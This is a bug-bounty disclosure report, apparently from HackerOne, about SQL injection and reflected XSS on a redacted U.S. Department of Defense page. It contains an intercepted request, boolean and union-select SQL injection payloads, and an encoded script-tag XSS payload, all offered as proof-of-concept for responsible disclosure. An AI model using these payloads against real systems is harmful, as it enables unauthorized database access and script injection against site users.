U.S. Dept Of Defense: [███] SQL injection & Reflected XSS

2019-01-23T21:08:17
ID H1:484801
Type hackerone
Reporter jarvis7
Modified 2019-12-02T19:11:46

Description

SQL injection test

  1. Go to site ███████
  2. Intercept this request

``` POST /viewem6.php HTTP/1.1 Host: ████ User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: ru,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://████████/ Content-Type: application/x-www-form-urlencoded Content-Length: 28 Connection: close Upgrade-Insecure-Requests: 1

rememail=test&rememail2=test Set this payload to paramrememail```

' or '1'='1

or ' or true --+ █████████ █████████

But if you set another payload ' or '1'='2

or ' or false --+

██████████ ███████

Also if you set payload ' union select 1--

You will have another request █████

I did not begin to extract any data about the server or database, since this may be contrary to the rules.

Reflected XSS

Using this payload I can execute XSS

' or '"<script>alert(1)</script>'='"<script>alert(1)</script>

You need to encode this payload

%27 or %27"<script>alert(1)</script>%27=%27"<script>alert(1)</script>

Result in Burp █████

Impact

Using this bug hacker can get access to database of server, also hacker can exploit XSS injection.